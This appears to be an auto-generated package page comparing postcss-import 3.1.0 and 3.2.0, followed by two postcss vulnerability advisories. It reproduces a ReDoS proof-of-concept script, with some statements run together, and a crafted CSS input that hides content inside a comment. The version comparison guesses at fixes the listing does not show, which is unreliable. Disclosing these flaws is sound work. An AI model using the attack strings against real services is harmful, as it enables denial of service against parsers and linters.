PostCSS Import is a valuable tool for developers seeking to streamline CSS management by enabling the modularization of stylesheets. Versions 3.1.0 and 3.2.0 share a common goal: simplifying the import of CSS files into PostCSS workflows. Underneath, both versions rely on the same core dependencies: clone, postcss, resolve, and postcss-message-helpers, ensuring consistent functionality for cloning objects, processing CSS with PostCSS, resolving file paths, and providing helpful messages. The development dependencies also remain consistent, with jscs, tape, jshint, and css-whitespace being used for code style checks, testing, linting, and whitespace analysis, respectively.
The notable difference between the two versions lies in their release dates. Version 3.1.0 came out on November 25, 2014, while version 3.2.0 was released shortly after on November 27, 2014. Although the core dependencies and development tools stayed the same, this quick release suggests that version 3.2.0 likely contained bug fixes or minor refinements addressing issues identified in the earlier 3.1.0 release. While the specific changes aren't detailed in the provided data, developers using PostCSS Import should opt for version 3.2.0 to benefit from any improvements and ensure a potentially more stable and reliable experience. Both versions are licensed under MIT.
All the vulnerabilities related to the version 3.2.0 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.